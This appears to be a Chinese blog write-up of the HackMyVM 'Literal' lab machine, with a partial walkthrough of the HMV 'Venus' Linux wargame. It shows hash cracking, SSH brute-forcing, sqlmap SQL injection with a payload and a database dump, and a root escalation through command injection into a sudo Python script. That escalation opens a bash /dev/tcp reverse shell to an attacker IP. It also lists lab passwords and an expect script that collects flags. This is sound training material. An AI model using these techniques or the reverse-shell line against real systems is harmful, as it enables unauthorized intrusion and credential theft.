aNdr3s1to:$2y$10$F2Eh43xkXR/b0KaGFY5MsOwlnh4fuEZX3WNhT3PxSw.6bi/OBA6hm
kitty:$2y$10$rXliRlBckobgE8mJTZ7oXOaZr4S2NSwqinbUGLcOfCWDra6v9bxcW
walter:$2y$10$er9GaSRv1AwIwu9O.tlnnePNXnzDfP7LQMAUjW2Ca1td3p0Eve6TO
estefy:$2y$10$hBB7HeTJYBAtdFn7Q4xzL.WT3EBMMZcuTJEAvUZrRe.9szCp19ZSa
michael:$2y$10$sCbKEWGgAUY6a2Y.DJp8qOIa250r4ia55RMrDqHoRYU3Y7pL2l8Km
r1ch4rd:$2y$10$7itXOzOkjrAKk7Mp.5VN5.acKwGi1ziiGv8gzQEK7FOFLomxV0pkO
fel1x:$2y$10$o06afYsuN8yk0yoA.SwMzucLEavlbI8Rl43.S0tbxL.VVSbsCEI0m
kelsey:$2y$10$vxN98QmK39rwvVbfubgCWO9W2alVPH4Dp4Bk7DDMWRvfN995V4V6.
jtx:$2y$10$jN5dt8syJ5cVrlpotOXibeNC/jvW0bn3z6FetbVU/CeFtKwhdhslC
DRphil:$2y$10$rW58MSsVEaRqr8uIbUeEeuDrYB6nmg7fqGz90rHYHYMt2Qyflm1OC
carm3N:$2y$10$D7uF6dKbRfv8U/M/mUj0KujeFxtbj6mHCWT5SaMcug45u7lo/.RnW
lanz:$2y$10$PLGN5.jq70u3j5fKpR8R6.Zb70So/8IWLi4e69QqJrM8FZvAMf..e
kali:$2y$10$zzhgE4mDcdEGhDR6VGwK9.qpCDLnDkFmVB6cSDo.bPNjKdUV.Hw1.

尝试进行破译：

┌──(kali㉿kali)-[~/temp/literal]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 18 password hashes with 18 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456789        (freddy123)     
butterfly        (estefy)     
monica           (r1ch4rd)     
hellokitty       (kitty)     
50cent           (DRphil)     
slipknot         (jorg3_M)     
michael1         (michael)     
147258369        (fel1x)     
kelsey           (kelsey)     
741852963        (walter)
zxcvbnm,./       (jtx)

尝试爆破但是失败了：

┌──(kali㉿kali)-[~]
└─$ hydra -L user.txt -P pass.txt ssh://192.168.21.5   
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-07 05:35:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:18/p:14), ~16 tries per task
[DATA] attacking ssh://192.168.21.5:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-09-07 05:36:54

在邮箱中发现forumtesting.literal.hmv，在/etc/hosts中添加一下,访问

跳转至http://forumtesting.literal.hmv/category.php

┌──(kali㉿kali)-[~]
└─$ curl http://forumtesting.literal.hmv/category.php
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap-theme.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<!-- jQuery -->
<title>c4TLoUis forum</title> 
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="css/style.css">
</head>
<body class="">
<div class="container" style="min-height:500px;">
        <div class="container">
        <div class="row">
                <h2>Discussion Forum | About... Imagination</h2>
                <h3><a href="category.php">Home</a> | <a href="login.php">Login</a> | <a href="cp_login.php">Control Panel</a></h3>


                                        <div class="single category">
                                <ul class="list-unstyled">
                                        <li><span style="font-size:25px;font-weight:bold;">Categories</span> <span class="pull-right"><span style="font-size:20px;font-weight:bold;">Topics / Posts</span></span></li>
                                                               <li><a href="category.php?category_id=2" title="">Forum details <span class="pull-right">0 / 0</span></a></li>
                                                               <li><a href="category.php?category_id=1" title="">New things for the blog <span class="pull-right">0 / 0</span></a></li>
                                                               </ul>
                   </div>
                </div>
</div>
<div class="insert-post-ads1" style="margin-top:20px;">

</body>
</html>

发现了会跳转到category.php?category_id=2和category.php?category_id=1，尝试SQL注入

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=1" --dbs
        ___
       __H__                                                    
 ___ ___[)]_____ ___ ___  {1.9.6#stable}                        
|_ -| . [(]     | .'| . |                                       
|___|_  [.]_|_|_|__,|  _|                                       
      |_|V...       |_|   https://sqlmap.org                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:07:25 /2025-09-07/

[05:07:25] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=i22h1s4iub5...odh6ljfn5r'). Do you want to use those [Y/n] y
[05:07:27] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:07:27] [INFO] testing if the target URL content is stable
[05:07:27] [INFO] target URL content is stable
[05:07:27] [INFO] testing if GET parameter 'category_id' is dynamic
[05:07:27] [INFO] GET parameter 'category_id' appears to be dynamic
[05:07:27] [WARNING] heuristic (basic) test shows that GET parameter 'category_id' might not be injectable
[05:07:27] [INFO] testing for SQL injection on GET parameter 'category_id'                                                      
[05:07:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'                                                    
[05:07:27] [WARNING] reflective value(s) found and filtering out
[05:07:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'                                            
[05:07:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'            
[05:07:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'                                                 
[05:07:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'                           
[05:07:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'                                           
[05:07:28] [INFO] testing 'Generic inline queries'
[05:07:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'                                                          
[05:07:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'                                               
[05:07:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'                                        
[05:07:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'                                                  
[05:07:48] [INFO] GET parameter 'category_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable     
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[05:07:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'                                                        
[05:07:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[05:07:53] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[05:07:53] [INFO] target URL appears to have 1 column in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
[05:07:55] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')                                                  
[05:07:55] [INFO] target URL appears to be UNION injectable with 1 columns
[05:07:55] [INFO] checking if the injection point on GET parameter 'category_id' is a false positive
GET parameter 'category_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 95 HTTP(s) requests:
---
Parameter: category_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category_id=1 AND (SELECT 1383 FROM (SELECT(SLEEP(5)))xNgV)
---
[05:08:38] [INFO] the back-end DBMS is MySQL
[05:08:38] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[05:08:38] [INFO] fetching database names
[05:08:38] [INFO] fetching number of databases
[05:08:38] [INFO] retrieved: 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[05:09:11] [INFO] adjusting time delay to 1 second due to good response times
3
[05:09:11] [INFO] retrieved: information_schema
[05:11:06] [INFO] retrieved: performance_schema
[05:12:57] [INFO] retrieved: forumtesting
available databases [3]:
[*] forumtesting
[*] information_schema
[*] performance_schema

[05:14:16] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 72 times
[05:14:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/forumtesting.literal.hmv'      

[*] ending @ 05:14:16 /2025-09-07/
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=1" -D forumtesting --tables
        ___
       __H__                                                    
 ___ ___[,]_____ ___ ___  {1.9.6#stable}                        
|_ -| . ["]     | .'| . |                                       
|___|_  [.]_|_|_|__,|  _|                                       
      |_|V...       |_|   https://sqlmap.org                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:20:33 /2025-09-07/

[05:20:33] [INFO] resuming back-end DBMS 'mysql' 
[05:20:33] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=1lqb93c1bl9...s3e3671pdm'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category_id=1 AND (SELECT 1383 FROM (SELECT(SLEEP(5)))xNgV)
---
[05:21:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.12
[05:21:00] [INFO] fetching tables for database: 'forumtesting'
[05:21:00] [INFO] fetching number of tables for database 'forumtesting'                                                         
[05:21:00] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[05:21:39] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
5
[05:21:49] [INFO] retrieved: 
[05:21:59] [INFO] adjusting time delay to 1 second due to good response times
forum_category
[05:23:31] [INFO] retrieved: forum_owner
[05:24:19] [INFO] retrieved: forum_posts
[05:25:11] [INFO] retrieved: forum_topics
[05:26:06] [INFO] retrieved: forum_users
Database: forumtesting
[5 tables]
+----------------+
| forum_category |
| forum_owner    |
| forum_posts    |
| forum_topics   |
| forum_users    |
+----------------+

[05:26:48] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/forumtesting.literal.hmv'      

[*] ending @ 05:26:48 /2025-09-07/
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=1" -D forumtesting -T forum_owner --dump
        ___
       __H__                                                    
 ___ ___[(]_____ ___ ___  {1.9.6#stable}                        
|_ -| . ["]     | .'| . |                                       
|___|_  [(]_|_|_|__,|  _|                                       
      |_|V...       |_|   https://sqlmap.org                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:14:15 /2025-09-07/

[06:14:15] [INFO] resuming back-end DBMS 'mysql' 
[06:14:15] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=v5p5ga41ijk...tke50atlns'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category_id=1 AND (SELECT 1383 FROM (SELECT(SLEEP(5)))xNgV)
---
[06:14:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.12
[06:14:16] [INFO] fetching columns for table 'forum_owner' in database 'forumtesting'
[06:14:16] [INFO] resumed: 5
[06:14:16] [INFO] resumed: created
[06:14:16] [INFO] resumed: email
[06:14:16] [INFO] resumed: id
[06:14:16] [INFO] resumed: password
[06:14:16] [INFO] resumed: username
[06:14:16] [INFO] fetching entries for table 'forum_owner' in database 'forumtesting'
[06:14:16] [INFO] fetching number of entries for table 'forum_owner' in database 'forumtesting'                                 
[06:14:16] [INFO] resumed: 1
[06:14:16] [INFO] resumed: 2022-02-12
[06:14:16] [INFO] resumed: carlos@forumtesting.literal.htb
[06:14:16] [INFO] resumed: 1
[06:14:16] [INFO] resumed: 6705fe62010679f04257358241792b41acba4ea896178a40eb63c743f5317a09faefa2e056486d55e9c05f851b222e6e7c5c1bd22af135157aa9b02201cf4e99
[06:14:16] [INFO] resumed: carlos
[06:14:16] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[06:14:17] [INFO] writing hashes to a temporary file '/tmp/sqlmaphevyecj1170215/sqlmaphashes-elmqvfdz.txt'                      
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[06:14:18] [INFO] using hash method 'sha512_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[06:15:09] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[06:15:11] [INFO] starting dictionary-based cracking (sha512_generic_passwd)
[06:15:11] [INFO] starting 8 processes 
[06:15:17] [INFO] using suffix '1'                             
[06:15:23] [INFO] using suffix '123'                           
[06:15:30] [INFO] using suffix '2'                             
[06:15:36] [INFO] using suffix '12'                            
[06:15:43] [INFO] using suffix '3'                             
[06:15:51] [INFO] using suffix '13'                            
[06:15:57] [INFO] using suffix '7'                             
[06:16:05] [INFO] using suffix '11'                            
[06:16:12] [INFO] using suffix '5'                             
[06:16:19] [INFO] using suffix '22'                            
[06:16:26] [INFO] using suffix '23'                            
[06:16:33] [INFO] using suffix '01'                            
[06:16:39] [INFO] using suffix '4'                             
[06:16:46] [INFO] using suffix '07'                            
[06:16:53] [INFO] using suffix '21'                            
[06:17:00] [INFO] using suffix '14'                            
[06:17:07] [INFO] using suffix '10'                            
[06:17:13] [INFO] using suffix '06'                            
[06:17:20] [INFO] using suffix '08'                            
[06:17:26] [INFO] using suffix '8'                             
[06:17:33] [INFO] using suffix '15'                            
[06:17:39] [INFO] using suffix '69'                            
[06:17:46] [INFO] using suffix '16'                            
[06:17:52] [INFO] using suffix '6'                             
[06:17:59] [INFO] using suffix '18'                            
[06:18:06] [INFO] using suffix '!'                             
[06:18:13] [INFO] using suffix '.'                             
[06:18:20] [INFO] using suffix '*'                             
[06:18:27] [INFO] using suffix '!!'                            
[06:18:34] [INFO] using suffix '?'                             
[06:18:40] [INFO] using suffix ';'                             
[06:18:47] [INFO] using suffix '..'                            
[06:18:53] [INFO] using suffix '!!!'                           
[06:19:01] [INFO] using suffix ', '                            
[06:19:08] [INFO] using suffix '@'                             
[06:19:15] [WARNING] no clear password(s) found                
Database: forumtesting
Table: forum_owner
[1 entry]
+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+
| id | email                           | created    | password                                                                                                                         | username |
+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+
| 1  | carlos@forumtesting.literal.htb | 2022-02-12 | 6705fe62010679f04257358241792b41acba4ea896178a40eb63c743f5317a09faefa2e056486d55e9c05f851b222e6e7c5c1bd22af135157aa9b02201cf4e99 | carlos   |
+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+

[06:19:15] [INFO] table 'forumtesting.forum_owner' dumped to CSV file '/home/kali/.local/share/sqlmap/output/forumtesting.literal.hmv/dump/forumtesting/forum_owner.csv'                        
[06:19:15] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/forumtesting.literal.hmv'      

[*] ending @ 06:19:15 /2025-09-07/

破解得到：carlos:forum100889，但是却登录失败，看了大佬的博客才知道这个联系着社工

网站论坛名字为forumtesting，社会工程学来看他密码取为forum100889是因为对应着平台前五位以及数字，作者的常用密码格式就是xxxxx100889,所以他的ssh密码可能为ssh100889

提权

carlos@literal:~$ sudo -l
Matching Defaults entries for carlos on
    literal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User carlos may run the following
        commands on literal:
    (root) NOPASSWD:
        /opt/my_things/blog/update_project_status.py
        *
carlos@literal:~$ cat /opt/my_things/blog/update_project_status.py
#!/usr/bin/python3

# Learning python3 to update my project status
## (mental note: This is important, so administrator is my safe to avoid upgrading records by mistake) :P

'''
References:
* MySQL commands in Linux: https://www.shellhacks.com/mysql-run-query-bash-script-linux-command-line/
* Shell commands in Python: https://stackabuse.com/executing-shell-commands-with-python/
* Functions: https://www.tutorialspoint.com/python3/python_functions.htm
* Arguments: https://www.knowledgehut.com/blog/programming/sys-argv-python-examples
* Array validation: https://stackoverflow.com/questions/7571635/fastest-way-to-check-if-a-value-exists-in-a-list
* Valid if root is running the script: https://stackoverflow.com/questions/2806897/what-is-the-best-way-for-checking-if-the-user-of-a-script-has-root-like-privileg
'''

import os
import sys
from datetime import date

# Functions ------------------------------------------------.
def execute_query(sql):
    os.system("mysql -u " + db_user + " -D " + db_name + " -e \"" + sql + "\"")

# Query all rows
def query_all():
    sql = "SELECT * FROM projects;"
    execute_query(sql)

# Query row by ID
def query_by_id(arg_project_id):
    sql = "SELECT * FROM projects WHERE proid = " + arg_project_id + ";"
    execute_query(sql)

# Update database
def update_status(enddate, arg_project_id, arg_project_status):
    if enddate != 0:
        sql = f"UPDATE projects SET prodateend = '" + str(enddate) + "', prostatus = '" + arg_project_status + "' WHERE proid = '" + arg_project_id + "';"
    else:
        sql = f"UPDATE projects SET prodateend = '2222-12-12', prostatus = '" + arg_project_status + "' WHERE proid = '" + arg_project_id + "';"

    execute_query(sql)

# Main program
def main():
    # Fast validation
    try:
        arg_project_id = sys.argv[1]
    except:
        arg_project_id = ""

    try:
        arg_project_status = sys.argv[2]
    except:
        arg_project_status = ""

    if arg_project_id and arg_project_status: # To update
        # Avoid update by error
        if os.geteuid() == 0:
            array_status = ["Done", "Doing", "To do"]
            if arg_project_status in array_status:
                print("[+] Before update project (" + arg_project_id + ")\n")
                query_by_id(arg_project_id)

                if arg_project_status == 'Done':
                    update_status(date.today(), arg_project_id, arg_project_status)
                else:
                    update_status(0, arg_project_id, arg_project_status)
            else:
                print("Bro, avoid a fail: Done - Doing - To do")
                exit(1)

            print("\n[+] New status of project (" + arg_project_id + ")\n")
            query_by_id(arg_project_id)
        else:
            print("Ejejeeey, avoid mistakes!")
            exit(1)

    elif arg_project_id:
        query_by_id(arg_project_id)
    else:
        query_all()

# Variables ------------------------------------------------.
db_user = "carlos"
db_name = "blog"

# Main program
main()

carlos@literal:~$ sudo /opt/my_things/blog/update_project_status.py
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
| proid | proname                                                      | prodatecreated      | prodateend | prostatus |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
|     1 | Ascii Art Python - ABCdario with colors                      | 2021-09-20 17:51:59 | 2021-09-20 | Done      |
|     2 | Ascii Art Python - Show logos only with letter A             | 2021-09-20 18:06:22 | 2222-12-12 | To do     |
|     3 | Ascii Art Bash - Show musical stores (WTF)                   | 2021-09-20 18:06:50 | 2222-12-12 | To do     |
|     4 | Forum - Add that people can send me bug reports of projects  | 2023-04-07 17:40:41 | 2023-11-01 | Doing     |
|     5 | Validate syntax errors on blog pages                         | 2021-09-20 18:07:43 | 2222-12-12 | Doing     |
|     6 | Script to extract info from files and upload it to any DB    | 2021-09-20 18:07:58 | 2222-12-12 | Doing     |
|     7 | Forum - Implement forum form                                 | 2023-04-07 17:46:38 | 2023-11-01 | Doing     |
|     8 | Add that people can create their own projects on DB          | 2021-09-20 18:49:52 | 2222-12-12 | To do     |
|     9 | Ascii Art C - Start learning Ascii Art with C                | 2021-09-20 18:50:02 | 2222-12-12 | To do     |
|    10 | Ascii Art Bash - Welcome banner preview in blog home         | 2021-09-20 18:50:08 | 2222-12-12 | To do     |
|    11 | Blog - Create login and register form                        | 2023-04-07 17:40:28 | 2023-08-21 | Done      |
|    12 | Blog - Improve the appearance of the dashboard/projects page | 2021-09-20 18:50:18 | 2222-12-12 | Doing     |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+

分析：

sudo权限：用户carlos可以以root身份无密码运行 /opt/my_things/blog/update_project_status.py *（注意通配符*）
脚本漏洞：脚本使用 os.system() 来执行MySQL查询，但没有正确过滤用户输入。

代码执行点：在 execute_query() 函数中：

pythonos.system("mysql -u " + db_user + " -D " + db_name + " -e "" + sql + """)

sudo /opt/my_things/blog/update_project_status.py '1" && bash -c "bash -i >& /dev/tcp/192.168.0.106/4444 0>&1" #' Doing

(remote) root@literal:/home/carlos# cat user.txt 
6d3c8a6c73cf4f89eea7ae57f6eb9222

(remote) root@literal:/root# cat root.txt 
ca43cb966ef76475d9e0736feeb9f730

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/literal/

HMV-Venus

呼啸山庄 — Wed, 14 Jan 2026 00:00:00 GMT

一键获取flag

sophia/Y1o645M3mR84ejc
angela/oh5p9gAABugHBje
emma/fIvltaGaq0OUH8O
mia/iKXIYg0pyEH2Hos
camila/F67aDmCAAgOOaOc
luna/j3vkuoKQwvbhkMc
eleanor/UNDchvln6Bmtu7b
victoria/pz8OqvJBFxH0cSj
isla/D3XTob0FUImsoBb
violet/WKINVzNQLKLDVAc
lucy/OCmMUjebG53giud
elena/4xZ5lIKYmfPLg9t
alice/Cgecy2MY2MWbaqt
anna/w8NvY27qkpdePox
natalia/NMuc4DkYKDsmZ5z
eva/upsCA3UFu10fDAO
clara/39YziWp5gSvgQN9
frida/Ed4ErEUJEaMcXli
eliza/Fg6b6aoksceQqB9
iris/kYjyoLcnBZ9EJdz
eloise/yOUJlV0SHOnbSPm
lucia/uvMwFDQrQWPMeGP
isabel/H5ol8Z2mrRsorC0
freya/EEDyYFDwYsmYawj
alexa/mxq9O3MSxxX9Q3S
ariel/33EtHoz9a0w2Yqo
lola/d3LieOzRGX5wud6
celeste/VLSNMTKwSV2o8Tn
nina/ixpeqdWuvC5N9kG
kira/tPlqxSKuT4eP3yr
veronica/QTOel6BodTx2cwX
lana/UWbc0zNEVVops1v
noa/9WWOPoeJrq6ncvJ
maia/h1hnDPHpydEjoEN
gloria/v7xUVE2e5bjUcxw
alora/mhrTFCoxGoqUxtw
julie/sjDf4i2MSNgSvOv
irene/8VeRLEFkBpe2DSD
adela/nbhlQyKuaXGojHx
sky/papaparadise
sarah/LWOHeRgmIxg7fuS
mercy/ym5yyXZ163uIS8L
paula/dlHZ6cvX6cLuL8p
karla/gYAmvWY3I7yDKRf
denise/pFg92DpGucMWccA
zora/BWm1R3jCcb53riO
belen/2jA0E8bQ4WrGwWZ
leona/freedom
ava/oCXBeeEeYFX34NU
maria/.--. .- .--. .- .--. .- .-. .- -.. .. ... .

#!/usr/bin/expect -f
set timeout 10

set host "venus.hackmyvm.eu"
set port 5000
set ssh_user "hacker"
set ssh_pass "havefun!"
set prompt {[$#] $}

# 读取用户
set f [open "users.txt" r]
set users [split [read $f] "\n"]
close $f

# SSH 登录一次
spawn ssh -o StrictHostKeyChecking=no -p $port $ssh_user@$host
expect "*assword:"
send "$ssh_pass\r"
expect -re $prompt

foreach line $users {
    if {[string trim $line] == ""} {
        continue
    }

    set user [lindex $line 0]
    set pass [lindex $line 1]

    puts "\n===== $user ====="

    send "su $user\r"
    expect {
        "*assword:" {
            send "$pass\r"
        }
        "*Authentication failure*" {
            puts "FAIL $user su failed"
            expect -re $prompt
            continue
        }
    }

    expect {
        "*Authentication failure*" {
            puts "FAIL $user su failed"
            expect -re $prompt
            continue
        }
        -re $prompt {
            send "cd /pwned/$user; cat flagz.txt 2>/dev/null || echo 'no flag'\r"
            expect -re $prompt
            send "exit\r"
            expect -re $prompt
        }
    }
}

send "exit\r"
expect eof

Instruction

Do you love Linux and CTFs? WTF, so you are like us!
Enjoy practicing your Linux skills to get the flags and to find the password to log in as other users.
This is a beginner level so enjoy and be patient!

Start

$ ssh hacker@venus.hackmyvm.eu -p 5000
password :havefun!

【成功连接，游戏开始】

每个用户的主目录下都会有一个 mission.txt

Mission 0x01

$ ls
mission.txt  readme.txt
// mission.txt 是任务，readme.txt 是游戏介绍
$ cat mission.txt
################
# MISSION 0x01 #
################

## EN ##
User sophia has saved her password in a hidden file in this folder. Find it and log in as sophia.
## ES ##
La usuaria sophia ha guardado su contraseña en un fichero oculto en esta carpeta.Encuentralo y logueate como sophia.

任务 0x01是获取用户 sophia的密码并登录，任务提示是当前目录的隐藏文件，使用ls -a查看隐藏文件，得到密码 Y1o645M3mR84ejc

// 切换用户
$ su sophia
// 到用户的主目录
$ cd ../sophia       在目录下的到第一个flag和下一个任务

Mission 0x02

$ cat mission.txt
################
# MISSION 0x02 #
################

## EN ##
The user angela has saved her password in a file but she does not remember where ... she only remembers that the file was called whereismypazz.txt 

## ES ##
La usuaria angela ha guardado su password en un fichero pero no recuerda donde... solo recuerda que el fichero se llamaba whereismypazz.txt

任务 0x02是获取 angela的密码并登录，任务提示了存放密码的文件名，但没有提供目录，所以我们需要使用find命令来查找文件

$ find / -name whereismypazz.txt 2>/dev/null
/usr/share/whereismypazz.txt
// 直接查看
$ cat /usr/share/whereismypazz.txt

得到密码oh5p9gAABugHBje,切换用户到 angela, 到该用户的主目录下获取到第二个flag 和任务 0x03

Mission 0x03

$ cat mission.txt
################
# MISSION 0x03 #
################
## EN ##
The password of the user emma is in line 4069 of the file findme.txt
## ES ##
La password de la usuaria emma esta en la linea 4069 del fichero findme.txt

任务提示密码在 findme.txt文件的第 4096 行，获取到改行的数据就是密码

$ head -n 4096 findme.txt | tail -n 1
fIvltaGaq0OUH8O
切换到 emma ，在主目录下发现flag和下一个任务

这里列出几个获取第 50 行数据的指令

head -n 50 filename | tail -n 1
cat -n filename | grep "50"
awk "NR==50" filename
sed -n '50p' filename
grep -n "" filename | grep "^50:" | cut -d: -f2-

Mission 0x04

################
# MISSION 0x04 #
################

## EN ##
User mia has left her password in the file -.
## ES ##
La usuaria mia ha dejado su password en el fichero -.

用户mia的密码在文件 -中，这里有一个坑，不能直接使用cat -读取名为 -的文件

$ cat ./-         #读取当前目录下的名为 - 的文件
iKXIYg0pyEH2Hos
在mia的家目录下获取到flag和下一个任务

Mission 0x05

################
# MISSION 0x05 #
################
## EN ##
It seems that the user camila has left her password inside a folder called hereiam 
## ES ##
Parece que la usuaria camila ha dejado su password dentro de una carpeta llamada hereiam

任务提示密码在文件夹hereiam下，我们需要查找该文件夹的位置

$ find / -type d -name hereiam 2>/dev/null
/opt/hereiam    # 密码在该目录下的隐藏文件 .here里

获取用户camila的密码F67aDmCAAgOOaOc，切换用户，转到其主目录下获取flag和下一个任务。

Mission 0x06

################
# MISSION 0x06 #
################
## EN ##
The user luna has left her password in a file inside the muack folder. 
## ES ##
La usuaria luna ha dejado su password en algun fichero dentro de la carpeta muack.

查看muack/下的文件夹

蛙趣，层层嵌套，手动查找肯定是不可能的了，使用 find命令可以达到想要的效果

$ find muack/ -type f -exec cat {} \;
j3vkuoKQwvbhkMc

得到用户luna的密码j3vkuoKQwvbhkMc,切换用户，在其主目录下发现flag和下一个Mission

Mission 0x07

################
# MISSION 0x07 #
################
## EN ##
The user eleanor has left her password in a file that occupies 6969 bytes. 
## ES ##
La usuaria eleanor ha dejado su password en un fichero que ocupa 6969 bytes.

任务提示文件密码在大小为 6969 bytes的文件内，继续使用 find命令查找符合条件的文件

$ find / -size 6969c -type f 2>/dev/null
/usr/share/moon.txt   # 查看moon.txt内的内容

获取到用户eleanor的密码UNDchvln6Bmtu7b，登录并到主目录下获取flag 和下一个任务指示

Misssion 0x08

################
# MISSION 0x08 #
################

## EN ##
The user victoria has left her password in a file in which the owner is the user violin. 

## ES ##
La usuaria victoria ha dejado su password en un fichero en el cual el propietario es el usuario violin.

任务提示，victoria的密码存在的文件的主人是 violin，find命令也可以查找所有者的文件

$ find / -type f -name "*" -user violin -exec cat {} \; 2>/dev/null
pz8OqvJBFxH0cSj

获取到用户victoria的密码，登录并到其主目录下获得flag和下一个任务指示。

Mission 0x09

################
# MISSION 0x09 #
